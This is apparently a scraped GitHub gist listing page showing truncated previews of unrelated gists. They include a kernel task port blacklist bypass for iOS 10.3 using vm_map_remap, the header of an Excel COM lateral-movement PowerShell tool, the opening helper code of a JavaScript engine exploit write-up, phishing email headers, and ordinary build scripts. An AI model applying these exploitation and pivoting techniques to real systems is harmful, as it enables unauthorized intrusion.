I hereby claim:
- I am Siguza on github.
- I am siguza (https://keybase.io/siguza) on keybase.
- I have a public key whose fingerprint is 6393 3A9D E301 7C59 ADE5 3EBB 1591 E8CA 0BCA 036F
To claim this, I am signing this object:
Siguza
/ keybase.md
Created
August 9, 2017 14:54
Siguza
/ zIVA_tfp0.md
Last active
April 22, 2021 23:38
Sadly I don't have a dev device on iOS 10, but for anyone playing around with zIVA caring about the kernel task port:
Starting with iOS 10.3 (and macOS 10.12.4), Apple changed convert_port_to_locked_task (and a few other port-to-something conversion functions) to blacklist the kernel task by means of a direct check. As a result, you can still obtain the kernel task port, but almost all APIs will simply treat it like MACH_PORT_NULL, thus rendering it useless. The check is a simple pointer comparison though, so it can be circumvented by just remapping the task struct at an additional virtual address and creating a new port from that with a ROP equivalent of:
vm_map_remap(
kernel_map,
&remap_addr,
sizeof(task_t),
0,
VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR,
enigma0x3
/ Invoke-ExcelMacroPivot.ps1
Created
September 11, 2017 14:51
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-ExcelMacroPivot{ | |
| <# | |
| .AUTHOR | |
| Matt Nelson (@enigma0x3) | |
| .SYNOPSIS | |
| Pivots to a remote host by using an Excel macro and Excel's COM object | |
| .PARAMETER Target | |
| Remote host to pivot to | |
| .PARAMETER RemoteDocumentPath | |
| Local path on the remote host where the payload resides |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # deboot.sh | |
| # script to build Ubuntu rootfs (for arm64, armhf, powerpc, ppc64el) | |
| # | |
| # Copyright 2017 knotdevel | |
| # Released under the MIT license | |
| # http://opensource.org/licenses/mit-license.php | |
| # | |
| # |
Siguza
/ dpkg_merge.c
Created
October 6, 2017 09:19
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Siguza | |
| // Treat as public domain. | |
| #include <ctype.h> // isspace | |
| #include <stdlib.h> // malloc, free, | |
| #include <string.h> // strlen, strncmp, strstr | |
| // Turn delimiter tokens into null terminators and | |
| // create array of pointers to each new string. | |
| static void destructive_split(char *str, const char *delim, char ***out, size_t *outlen) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Moved here: https://github.com/Siguza/misc/blob/master/dsc_syms.c |
Siguza
/ PayPalPhishing.md
Created
February 15, 2018 15:02
Not long ago I tweeted about some PayPal phishing mails I got, which appeared to use hacked websites for their cause, and of which all traces were gone 24h after my initial recon.
Well, I got another such mail:
Return-Path: <rcp133066@jmenviro.com>
X-Original-To: Contact@siguza.net
Delivered-To: siguza@siguza.net
Received: from linuxhosting09.rediff.com (host152-150.mxout.rediffmailpro.com [119.252.152.150])
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| rm -rf /home/yen3/ubuntu.qcow2 | |
| qemu-img create -f qcow2 /home/yen3/ubuntu.qcow2 10G | |
| virsh undefine ubuntu1604arm64 --nvram | |
| install_from_localtion() { | |
| virt-install -n ubuntu1604arm64 --memory 1024 --arch aarch64 --vcpus 1 \ | |
| --disk /home/yen3/ubuntu.qcow2,device=disk,bus=virtio \ |
romanking98
/ gogogadget_writeup.md
Created
March 24, 2018 15:18
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Load Int library, thanks saelo! | |
| load('util.js'); | |
| load('int64.js'); | |
| // Helpers to convert from float to in a few random places | |
| var conva = new ArrayBuffer(8); | |
| var convf = new Float64Array(conva); | |
| var convi = new Uint32Array(conva); | |
| var convi8 = new Uint8Array(conva); |